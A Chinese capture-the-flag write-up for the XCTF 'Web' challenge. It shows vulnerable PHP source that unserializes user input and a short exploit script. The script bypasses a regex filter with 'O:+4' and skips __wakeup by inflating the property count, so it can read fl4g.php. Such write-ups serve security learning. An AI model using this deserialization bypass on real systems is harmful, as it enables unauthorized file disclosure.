攻防世界-Web-Web

项目场景：

 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

---

问题描述

根据题目提示可以知道是关于php反序列化的问题，需要对Demo函数进行反序列化，__wakeup进行绕过，并且需要注意preg_match函数中关于/[oc]:\d+:/i的绕过，最后通过GET请求传入var为用base64转化过的payload

---

原因分析：

看以看出flag在fl4g.php中，并且__destruct中告诉我们如果Demo类被销毁，那么就会高亮显示file所指向的文件的内容，接下来需要进行对preg_match函数中关于/[oc]:\d+:/i的绕过

---

解决方案：

exp：

class Demo {
    private $file = 'fl4g.php';
}

$payload = serialize(new Demo);
$payload = str_replace('O:4', 'O:+4', $payload);//绕过preg_match()
$payload = str_replace(':1:', ':3:', $payload);//绕过__wakeup()
echo base64_encode($payload);

运行得到反序列化结果